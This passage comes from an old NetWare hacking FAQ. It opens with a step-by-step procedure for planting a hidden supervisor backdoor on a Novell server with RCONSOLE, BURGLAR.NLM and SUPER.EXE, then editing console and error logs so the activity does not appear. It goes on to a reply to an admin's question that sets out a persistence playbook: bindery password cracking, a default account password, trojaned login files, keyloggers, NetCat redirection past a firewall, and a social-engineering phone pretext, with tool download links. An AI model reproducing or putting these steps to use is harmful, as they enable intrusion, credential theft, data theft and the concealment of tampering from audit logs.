RCONSOLE.* to it, and run RCONSOLE. Once in try to unload CONLOG and upload BURGLAR.NLM to the real SYS:SYSTEM. Created a Supe user (i.e. NEWUSER) and then typed CLS to clear the server console screen. Log in as NEWUSER. Erase BURGLAR.NLM, new SYSTEM directory and its contents. Run PURGE in those directories. Turn off Accounting if on. Give GUEST Supe rights. Set toggle with SUPER.EXE for NEWUSER. Run FILER and note SYS:ETC\CONSOLE.LOG (if CONLOG was loaded) owner and create date, as well as SYS:SYSTEM\SYS$ERR.LOG owner and create date. Edit SYS:ETC\CONSOLE.LOG and remove BURGLAR.NLM activity, including RCONSOLE activity. Edit and remove RCONSOLE activity from SYS:SYSTEM\SYS$ERR.LOG as well. After saving files, run FILER and restore owner and dates if needed. Run PURGE in their directories. Logout and login as GUEST and set SUPER.EXE toggle. Remove NEWUSER Supe rights and logout. Login as NEWUSER with SUPER.EXE and remove GUEST Supe rights. Finally logout and login as GUEST with SUPER.EXE and turn on Accounting if it was on. Summary - You have created a backdoor into the system that will not show up as somthing unusual in the Accounting log. Login as GUEST using SUPER.EXE and turn off Accounting. Logout and back in as NEWUSER with SUPER.EXE, do what you need to do (covering file alterations with Filer), and logout. Log back in as GUEST and turn on Accounting. The NET$ACCT.DAT file shows only GUEST logging in followed by GUEST logging out. --------------------------------------------------------------------------- 12-3. I have xxx setup and xxx version running. Am I secure? This question has been coming up lately. A lot. Admins asking me if their sites are secure. Here is an example from a post to one of the Netware newsgroups with my comments, as it is generic enough to apply to a number of locations (in other words, no you are not 100% secure): >Here is the scenario: A supervisor of a network suspects that he may >be facing termination of employment in the near future. He is embittered >and aggravated. As system administrator for the network, he oversees >the computers that track all business actions. Basically, he can bring >the organization to it's knees in a heartbeat, and he knows it. He has >made comments in passing that it is possible that either time bombs have >been set in the system, or that a possible "Dead-man's clutch" may exist >(if he's not there to disable some mechanism daily/weekly the system will >be compromised). Not nearly as easy to set up in the environment you've specified. However, I'd let that rumor continue so as to waste your time looking for a dead-man's clutch. In the meantime, I'd be stealing stuff from those databases and selling them to the competition. >Here is the tech specs: A Novell 3.12 server that serves databases, email >and user files to 30 PC's running Windows 3.1. The network is attached >to the Internet. No OS's other than DOS/Windows and Novell. The >network is attached to a larger network that is very accessible to the >public (via physically attached machines, and the Internet). There >are no firewalls. The supervisor is the only person with supervisor >password/privileges on the server, as well as the only person who knows >the details of the network, the server disk layout, the server nlm's. >Basically the only person who has been inside the server which is such >a vitally mission critical system. > >Here's what I have so far: > 1. quarantine the 30 node network and server by physically > disabling it's Ethernet access to the outside world. This is an interesting step. However your problem returns once you re-attach. > 2. make a full system backup of the server before touching > investigating or touching anything. If a problem occurs and you restore your backups, any virii, trojans, and other back doors will get back into the system. > 3. "secure" the Novell server (see below) Read my hack FAQ. ftp://ftp.fastlane.net/pub/nomad/nw/faq.zip You see, if I were to leave a backdoor, I would leave several. 1) I would run BINDFIX and then run a bindery cracker on ALL accounts on the server against the .OLD bindery files. I would use ftp://ftp.fastlane.net/pub/nomad/nw/bindery.zip to do this, along with a huge word list. This should not only get me most passwords on the system, but get automated passwords as well. For example, Arcserve 5.01g installs an account called CHEY_ARCHSVR with station restrictions and a password of WONDERLAND. I'd remove the station restrictions and either use SUPER.EXE to set up CHEY_ARCHSVR as a toggled Supe account, or just make it plain old Supe equivalent. Most people do not check these kinds of accounts. 2) I would install the alternate LOGIN.EXE and PROP.EXE to give myself a way to see new passwords that have been changed. These files can be found at ftp://ftp.fastlane.net/pub/nomad/nw/nwl.zip, details in the FAQ. 3) I would delete all zero length personal login files (see the FAQ for why). 4) Any logins (such as the one possibly used by an SMTP gateway) which would be normally restricted would be toggled with SUPER.EXE. GUEST would be toggled. 5) Message files (such as the ones used in displaying error messages) would be hacked so that security violations would display harmless messages. > 4. "secure" all PC's (see below) I would install keystroke grabbers on a number of machines, like those found at ftp://onyx.infonexus.com/pub/ToolsOfTheTrade/DOS/KeyLoggers/ > 5. erect a firewall disabling IPX passage into the network > but allowing TCP/IP (email services required). I would use some of these "very public" machines and install a sniffer, and I would use NetCat to redirect port 25 traffic to a particular address to a different machine's telnetd, bypassing the firewall. ftp://onyx.infonexus.com/pub/ToolsOfTheTrade/Unix/nc100.tgz for NetCat. With the sniffer it could be possible to get the RCONSOLE password. See ftp://ftp.fastlane.net/pub/nomad/nw/rcon*.zip for details. I would make sure that IP is on my server, and make sure XCONSOLE is running. Once past the firewall, I'd telnet to the server's IP address and run either X11 or VT100 remote console sessions with the server. > 6. notify the supervisor that he is fired, and take whatever > actions are necessary to keep him from coming in physical > contact with the network. If planned ahead, the supe will have his/her backdoors in place, and this will not matter. In fact, s/he will probably MAKE SURE that they do not even look at a machine. >There's a gotcha, getting the supervisor password. It would be >ideal to inadvertently get it, but thats a long shot. The system >administrator will probably have to be asked for it at step 6, whether >he gives it to us is IMHO unlikely. The FAQ tells how you can recover from this easily. Remember, you've eliminated social engineering from your checklist. I'd attach a modem to a PC for PCanyWhere and then call up stating, "I'm the vendor your ex-employee hired to dial in and check blah-blah. If I were you I'd change my dial-in password." Once in (in the middle of the night) I'd activate a backdoor and proceed to make your competitor rich. ---------------------------------------------------------------------------